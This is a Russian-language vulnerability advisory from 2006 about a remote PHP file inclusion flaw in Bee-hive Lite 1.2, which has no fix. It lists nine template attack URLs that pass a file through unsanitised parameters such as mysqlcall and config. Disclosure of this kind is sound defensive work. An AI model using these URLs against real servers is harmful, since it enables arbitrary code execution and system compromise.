PHP-инклюдинг в Bee-hive Lite

Дата публикации:
03.07.2006
Дата изменения:
03.07.2006
Всего просмотров:
1099
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Bee-hive Lite 1.x
Уязвимые версии: Bee-hive Lite 1.2, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметрах "mysqlcall", "prefix", "header", "config", и "mysqlCall" в различных сценариях. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[host]/include/listall.inc.php?mysqlcall=[file]
http://[host]/show/index.php?prefix=[file]
http://[host]/conad/include/rootGui.inc.php?header=[file]
http://[host]/conad/include/mysqlCall.inc.php?config=[file]
http://[host]/conad/changeEmail.inc.php?mysqlCall=[file]
http://[host]/conad/changeUserDetails.inc.php?mysqlCall=[file]
http://[host]/conad/checkPasswd.inc.php?mysqlCall=[file]
http://[host]/conad/login.inc.php?mysqlCall=[file]
http://[host]/conad/logout.inc.php?mysqlCall=[file]

URL производителя: products.magnet-i.com/show/beehive/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Beehive CMS ([header]) Remote File Include Vulnerabilities

или введите имя

CAPTCHA